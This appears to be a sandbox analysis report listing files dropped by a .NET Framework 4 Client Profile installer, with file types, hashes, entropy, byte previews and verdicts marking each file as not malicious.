                                                                                                                                                                  SSDEEP:1536:xWayqxMQP8ZOs0JOG58d8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdb:e/gB4H8vo2no0/aX7C7Dct
                                                                                                                                                                  MD5:F9657D290048E169FFABBBB9C7412BE0
                                                                                                                                                                  SHA1:E45531D559C38825FBDE6F25A82A638184130754
                                                                                                                                                                  SHA-256:B74AD253B9B8F9FCADE725336509143828EE739CC2B24782BE3ECFF26F229160
                                                                                                                                                                  SHA-512:8B93E898148EB8A751BC5E4135EFB36E3AC65AF34EAAC4EA401F1236A2973F003F84B5CFD1BBEE5E43208491AA1B63C428B64E52F7591D79329B474361547268
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............(...............h...............h...f... .............. .............. ..........^...00......h....#..00..........n)..00...........8........ .h....T.. .... .....&Y..00.... ..%...i........ ._...v...(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l.............................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Print.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                  Entropy (8bit):4.923507556620034
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAh:MjNyw/0NW9DOp/ANC
                                                                                                                                                                  MD5:7E55DDC6D611176E697D01C90A1212CF
                                                                                                                                                                  SHA1:E2620DA05B8E4E2360DA579A7BE32C1B225DEB1B
                                                                                                                                                                  SHA-256:FF542E32330B123486797B410621E19EAFB39DF3997E14701AFA4C22096520ED
                                                                                                                                                                  SHA-512:283D381AA396820B7E15768B20099D67688DA1F6315EC9F7938C2FCC3167777502CDED0D1BEDDF015A34CC4E5D045BCB665FFD28BA2FBB6FAF50FDD38B31D16E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h.......(....... ..... .....@.........................................................................................t?.fR.|bN.y_K.v\H.rXD.oUA.kQ=.hN:.eK7.cI5.cI5.cI5i.........th<..z............................................cI5.cI5...................................................qXE.cI5.cI5.......~.............................................}eS.kR>.cI5......................................................q`.w^L.cI5..............................z..~n..sb..jX.{bP.t[H..~m..kY.nT@.......................................................{..wf.zaM.......vO.......................q..r`.}cQ.w]J..lZ.......t.x^J...........}Z..................................z`M........{aM...............0..............................jY.{aO...........................................................x^K.x^Kk.....................................................n\.y_L...........................r...............................y_L.x^K&.........................s.............

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate1.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.5118974066097444
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+Wvtjlpr:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5c
                                                                                                                                                                  MD5:26A00597735C5F504CF8B3E7E9A7A4C1
                                                                                                                                                                  SHA1:D913CB26128D5CA1E1AC3DAB782DE363C9B89934
                                                                                                                                                                  SHA-256:37026C4EA2182D7908B3CF0CEF8A6F72BDDCA5F1CFBC702F35B569AD689CF0AF
                                                                                                                                                                  SHA-512:08CEFC5A2B625F261668F70CC9E1536DC4878D332792C751884526E49E7FEE1ECFA6FCCFDDF7BE80910393421CC088C0FD0B0C27C7A7EFF2AE03719E06022FDF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... .......................................................................................................................................................................................t.r........................................p.nn.l|.z..........................................g.e.......................................................................................P.N..........................................P.OG.FP.O..........................................?.>...................................................................................................+.*..........................................3.2%.$+.*..........................................!. ............{.{.............................................................................................~.~..................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate2.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.5178766234336925
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5c:Md5EaxWbh/Cnt4
                                                                                                                                                                  MD5:8419CAA81F2377E09B7F2F6218E505AE
                                                                                                                                                                  SHA1:2CF5AD8C8DA4F1A38AAB433673F4DDDC7AE380E9
                                                                                                                                                                  SHA-256:DB89D8A45C369303C04988322B2774D2C7888DA5250B4DAB2846DEEF58A7DE22
                                                                                                                                                                  SHA-512:74E504D2C3A8E82925110B7CFB45FDE8A4E6DF53A188E47CF22D664CBB805EBA749D2DB23456FC43A86E57C810BC3D9166E7C72468FBD736DA6A776F8CA015D1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... ...............................................................................................................................................................................................................................................................................................................................................................................r.p..........................................q.oj.hq.o..........................................b.`...................................................................................................J.I..................|.|...y.y...............Q.PC.BF.E..........................................>.=.........".!..........................................2.1".!'.&..........................................".!.....................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate3.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.5189797450574103
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5c:1gxPbXlBQ+gr1ffO4
                                                                                                                                                                  MD5:924FD539523541D42DAD43290E6C0DB5
                                                                                                                                                                  SHA1:19A161531A2C9DBC443B0F41B97CBDE7375B8983
                                                                                                                                                                  SHA-256:02A7FE932029C6FA24D1C7CC06D08A27E84F43A0CBC47B7C43CAC59424B3D1F6
                                                                                                                                                                  SHA-512:86A4C5D981370EFA20183CC4A52C221467692E91539AC38C8DEF1CC200140F6F3D9412B6E62FAF08CA6668DF401D8B842C61B1F3C2A4C4570F3B2CEC79C9EE8B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... .................................................................................................................................................................................................................................................................................................................................................................................................................z.z...{.{...........................................................................................................................................................s.q..........................................y.wl.jl.j...............3.2#."*.)..................f.d.........E.D.........(.'..............................U.TE.DF.E..........................................E.D.....................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate4.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.5119705312617957
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5c:p///FPwxUrMunUofRReFNHRp5c
                                                                                                                                                                  MD5:BB55B5086A9DA3097FB216C065D15709
                                                                                                                                                                  SHA1:1206C708BD08231961F17DA3D604A8956ADDCCFE
                                                                                                                                                                  SHA-256:8D82FF7970C9A67DA8134686560FE3A6C986A160CED9D1CC1392F2BA75C698AB
                                                                                                                                                                  SHA-512:DE9226064680DA6696976A4A320E08C41F73D127FBB81BF142048996DF6206DDB1C2FE347C483CC8E0E50A00DAB33DB9261D03F1CD7CA757F5CA7BB84865FCA9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... .............................................................................................................................................................................................................y.y...|.|.............................................................................................................................................................................................................................................,.+".!,.+.........................................(.'......................................................................................=.<..........................................S.RC.BG.F.............................j.h.........H.G..............................y.wj.hi.g..........................................j.h.....................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate5.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.5083713071878764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5c:pXBHehqSayIylrtBg/bk4AgzHRp5c
                                                                                                                                                                  MD5:3B4861F93B465D724C60670B64FCCFCF
                                                                                                                                                                  SHA1:C672D63C62E00E24FBB40DA96A0CC45B7C5EF7F0
                                                                                                                                                                  SHA-256:7237051D9AF5DB972A1FECF0B35CD8E9021471740782B0DBF60D3801DC9F5F75
                                                                                                                                                                  SHA-512:2E798B0C9E80F639571525F39C2F50838D5244EEDA29B18A1FAE6C15D939D5C8CD29F6785D234B54BDA843A645D1A95C7339707991A81946B51F7E8D5ED40D2C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... .................................................................................................{.{...~.~.......................................................................................}.}.........................................................).(#."2.1..........................................).(...................................................................................................=.<..........................................N.ME.DN.M..........................................M.L.......................................................................................e.c..........................................z.xl.jm.k........................................r.p........................................................................................................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate6.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.5043420982993396
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5c:tZ/u+HeilBh/F+Rd4
                                                                                                                                                                  MD5:70006BF18A39D258012875AEFB92A3D1
                                                                                                                                                                  SHA1:B47788F3F8C5C305982EB1D0E91C675EE02C7BEB
                                                                                                                                                                  SHA-256:19ABCEDF93D790E19FB3379CB3B46371D3CBFF48FE7E63F4FDCC2AC23A9943E4
                                                                                                                                                                  SHA-512:97FDBDD6EFADBFB08161D8546299952470228A042BD2090CD49896BC31CCB7C73DAB8F9DE50CDAF6459F7F5C14206AF7B90016DEEB1220943D61C7324541FE2C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... .................................................................................................... ............................................$.$ ..0./...........................{.{............ ...........<.;..........................................C.BA.@O.N...............{.{...~.~..................G.F..................................................................................................._.]..........................................n.lg.en.l..........................................p.n...............................................................................................................................................................................................................................................................................................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate7.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.4948009720290445
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5c:p8os0iieX8iNVHX//x2sHYdoHRp5c
                                                                                                                                                                  MD5:FB4DFEBE83F554FAF1A5CEC033A804D9
                                                                                                                                                                  SHA1:6C9E509A5D1D1B8D495BBC8F57387E1E7E193333
                                                                                                                                                                  SHA-256:4F46A9896DE23A92D2B5F963BCFB3237C3E85DA05B8F7660641B3D1D5AFAAE6F
                                                                                                                                                                  SHA-512:3CAEB21177685B9054B64DEC997371C4193458FF8607BCE67E4FBE72C4AF0E6808D344DD0D59D3D0F5CE00E4C2B8A4FFCA0F7D9352B0014B9259D76D7F03D404
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... ....................................................................................................G.F..........................................H.GG.FX.V..............................).(.........G.F.........i.g..................+.*%.$5.4...............n.ln.l{.y.................. .......................u.s............................................................................................................................................................~.~...~.~.................................................................................................................................................................................................................................................................................................................................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Rotate8.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                  Entropy (8bit):2.513882730304912
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:pPv1OuTerb53mpOBfXjQuZfKWpIXE1D6HRp5c:91OEerb53eUQsflpIP4
                                                                                                                                                                  MD5:D1C53003264DCE4EFFAF462C807E2D96
                                                                                                                                                                  SHA1:92562AD5876A5D0CB35E2D6736B635CB5F5A91D9
                                                                                                                                                                  SHA-256:5FB03593071A99C7B3803FE8424520B8B548B031D02F2A86E8F5412AC519723C
                                                                                                                                                                  SHA-512:C34F8C05A50DC0DE644D1F9D97696CDB0A1961C7C7E412EB3DF2FD57BBD34199CF802962CA6A4B5445A317D9C7875E86E8E62F6C1DF8CC3415AFC0BD26E285BD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............h.......(....... ....................................................................................................g.e..........................................g.eg.ew.u..............................F.E.........g.e..............................E.DA.@P.O..........................................:.9......................................................................................&.%.........................................+.* ..+.*..................................................................................................................................................{.{.......................................................................................~.~...{.{..............................................................................................................................................G.......................................G..........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Save.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                  Entropy (8bit):4.824239610266714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzn:h6kPccWPQS2UtEYFEKeu
                                                                                                                                                                  MD5:7D62E82D960A938C98DA02B1D5201BD5
                                                                                                                                                                  SHA1:194E96B0440BF8631887E5E9D3CC485F8E90FBF5
                                                                                                                                                                  SHA-256:AE041C8764F56FD89277B34982145D16FC59A4754D261C861B19371C3271C6E5
                                                                                                                                                                  SHA-512:AB06B2605F0C1F6B71EF69563C0C977D06C6EA84D58EF7F2BAECBA566D6037D1458C2B58E6BFD70DDEF47DCCBDEA6D9C2F2E46DEA67EA9E92457F754D7042F67
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h.......(....... ..... .....@........................................................................................klT.de..UV..RS..OP..MM..JJ..GG..DD..AA.x;<.x;<.r99.n67..........kl......D$.G2!...............VMH..>3..=6..91.r99..........op.........q[K.G<4..xh...........s..A5..B<..=5.x;<..........uv...........q[K.....G<4..........tg..KC..ID..B<.}>>..........{|.............q[K.q[K.q[K.q[K.vbR.}j[..VT..OL..ID..AA...............................yz..qr..kl..]\..VT..PL..DD.....................c`..^V..XK..R?..M4..G(..A...;...]\..VT..GG................fg.................................;...]\..JJ................mn..................................A...gg..MM................vw..................................G(..qr..OP..................................................M4..yz..RS..................................................R?.g33..UV....................................................XK..XY..XY..................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\Setup.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 12 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36710
                                                                                                                                                                  Entropy (8bit):5.3785085024370805
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:IXcWz9GU46B4riEzg8CKcqxkk63gBh6wSphnBcI/ObMFp2rOebgcjTQcho:IMWQ2Bf8qqxMQP8pc4XessTJo
                                                                                                                                                                  MD5:3D25D679E0FF0B8C94273DCD8B07049D
                                                                                                                                                                  SHA1:A517FC5E96BC68A02A44093673EE7E076AD57308
                                                                                                                                                                  SHA-256:288E9AD8F0201E45BC187839F15ACA79D6B9F76A7D3C9274C80F5D4A4C219C0F
                                                                                                                                                                  SHA-512:3BDE668004CA7E28390862D0AE9903C756C16255BDBB3F7E73A5B093CE6A57A3165D6797B0A643B254493149231ACA7F7F03E0AF15A0CBE28AFF02F0071EC255
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............(...............h...............h...V... .............. .............. ..........N...00......h...."..00..........^)..00...........8........ .h....T.. .... ......Y..00.... ..%...i..(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l..........................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\SysReqMet.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                  Entropy (8bit):5.038533294442847
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:MuoBP5lj49s9NRDe4LakKcTM8cv99uGzMN:MlFH3/Ri4LaN3q
                                                                                                                                                                  MD5:661CBD315E9B23BA1CA19EDAB978F478
                                                                                                                                                                  SHA1:605685C25D486C89F872296583E1DC2F20465A2B
                                                                                                                                                                  SHA-256:8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
                                                                                                                                                                  SHA-512:802CC019F07FD3B78FCEFDC8404B3BEB5D17BFC31BDED90D42325A138762CC9F9EBFD1B170EC4BBCCCF9B99773BD6C8916F2C799C54B22FF6D5EDD9F388A67C6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h.......(....... ..... .....@..........................................M...........S...........................................q.......................z...................................;........q.c.P.K.|.}............C....................................;.!......................................................Ry,.*w..!.............-.........................................6b..8v................ .+.@............#....................4u..;a..............H.<.........=.C.............................&y..x.e.................$}......................................<.).........\.A............}..................................[.R.}.n.Z.C.y.Y.k.L............. q..............................t.s............r...k.........]{G..............................................y.`.z.h.a.N.e.P...............................................~.q._.J...............................8....................t.p..................?..................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\SysReqNotMet.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                  Entropy (8bit):5.854644771288791
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:u2iVNINssNQhYMEyfCHWZZ7rTRrbWjcyuE:uDW871fdZ1lbWjME
                                                                                                                                                                  MD5:EE2C05CC9D14C29F586D40EB90C610A9
                                                                                                                                                                  SHA1:E571D82E81BD61B8FE4C9ECD08869A07918AC00B
                                                                                                                                                                  SHA-256:3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
                                                                                                                                                                  SHA-512:0F38FE9C97F2518186D5147D2C4A786B352FCECA234410A94CC9D120974FC4BE873E39956E10374DA6E8E546AEA5689E7FA0BEED025687547C430E6CEFFABFFB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h.......(....... ..... .....@....................................../..F..........!....n....d..................................;.............,+..AB..UV..XZ...1.....S......................U.....................EE..\[..rr......NP.....^..............<s.....................!.$)..AC..jj..ww..{{..57.....4........01.................H..........N?8;..[[..ba..`_..TU....L.......bj]^..QP.........:..........)N#&..>=..GG..HI..IJ..EE..!#......24..mm..hh..,.............+N........)(..*-.....{-...-,........ SPS..zy..qr....qq......0NCE..33..%%........ZJ...."$..0/../1....?qRU............W}..)A]^..rr..qq..Y[...._z........CE..RQ..AC....8`79.........SU..ab......||..ef....ey...........QZ[..ZZ..=?.....(...d....................pr.....H............IK..jj..fg..*,..........]_..................[y.......(..:VQS..{z..ut..ab....'H...........?................||..ef..jk..................$%d....................W....................................*,n.............................HI......................WY

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\stop.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                  Entropy (8bit):6.016582854640062
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLt:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYR
                                                                                                                                                                  MD5:5DFA8D3ABCF4962D9EC41CFC7C0F75E3
                                                                                                                                                                  SHA1:4196B0878C6C66B6FA260AB765A0E79F7AEC0D24
                                                                                                                                                                  SHA-256:B499E1B21091B539D4906E45B6FDF490D5445256B72871AECE2F5B2562C11793
                                                                                                                                                                  SHA-512:69A13D4348384F134BA93C9A846C6760B342E3A7A2E9DF9C7062088105AC0B77B8A524F179EFB1724C0CE168E01BA8BB46F2D6FAE39CABE32CAB9A34FC293E4A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@......................................................................................................wwx...........w....w.........x....x.........x.y.......................p..............x.........q.......p.........q.................xy...........q.......................p.............y..................x.y..............y.y.............yyy.........S........x..........yy.............x.yyyx......................Q.8.........x..............y....qy.p...y.....x.....p........y....9.....y....yy..yx.......y..yyyw..p.....y.yyyyy................x.p........y.yy..........x...x............x.................wwx.....................?...................................................................................................?............(....... ..................................................................................................ww.....w..........xx..x........x....p........xy

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Graphics\warn.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                  Entropy (8bit):4.3821301214809045
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:USAk9ODMuYKFfmiMyT4dvsZQl+g8DnPUmXtDV3EgTtc:r9wM7pyEBlcgssmXpVUgJc
                                                                                                                                                                  MD5:B2B1D79591FCA103959806A4BF27D036
                                                                                                                                                                  SHA1:481FD13A0B58299C41B3E705CB085C533038CAF5
                                                                                                                                                                  SHA-256:FE4D06C318701BF0842D4B87D1BAD284C553BAF7A40987A7451338099D840A11
                                                                                                                                                                  SHA-512:5FE232415A39E0055ABB5250B120CCDCD565AB102AA602A3083D4A4705AC6775D45E1EF0C2B787B3252232E9D4673FC3A77AAB19EC79A3FF8B13C4D7094530D2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@................................................................................................................................................................wwwww.....wwww...................3333333333338...{....3s.....x...{....0G;.............0.;...7.........33....8.....{...33..............0....7...............8.......{....;.............0.;.............0...8...........4...............wu;.............ww;.............ww;?...........;ww;.............7w................................8.............{...................................................................................................................................................................?...?..................................................?...?.........(....... ........................................................................................................333333;...............8.........;........

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Parameterinfo.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):201796
                                                                                                                                                                  Entropy (8bit):3.4097027044493644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9bs:w2RbYoVQTLTQTDFdPknZ13GpPcbrIl
                                                                                                                                                                  MD5:EB9D318BBEA1F384A78EDE1D1051F47D
                                                                                                                                                                  SHA1:ECD4391FE00D9BB73964456AF15FCD94DB676CC0
                                                                                                                                                                  SHA-256:73B29A019C1821304C65A30F338DB2747B950EBCC0E65C02CFF39A0166316A72
                                                                                                                                                                  SHA-512:91716D9A78852DB0ABE526A08C73C8349EEB997AD493A8F5B043E45A4A7AADB15FEBFBBC42641AEEC445BC36B0054A4520E051A0CE4CADD237510033F3A9BCE0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .C.l.i.e.n.t. .P.r.o.f.i.l.e. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Setup.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):78152
                                                                                                                                                                  Entropy (8bit):6.011592088917562
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:sYNItbBL5NWiiESc0exWZnqxMQP8ZOs0JD9rHUq:sYNAB9NWTZctc/gBJ9oq
                                                                                                                                                                  MD5:006F8A615020A4A17F5E63801485DF46
                                                                                                                                                                  SHA1:78C82A80EBF9C8BF0C996DD8BC26087679F77FEA
                                                                                                                                                                  SHA-256:D273460AA4D42F0B5764383E2AB852AB9AF6FECB3ED866F1783869F2F155D8BE
                                                                                                                                                                  SHA-512:C603ED6F3611EB7049A43A190ED223445A9F7BD5651100A825917198B50C70011E950FA968D3019439AFA0A416752517B1C181EE9445E02DA3904F4E4B73CE76
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
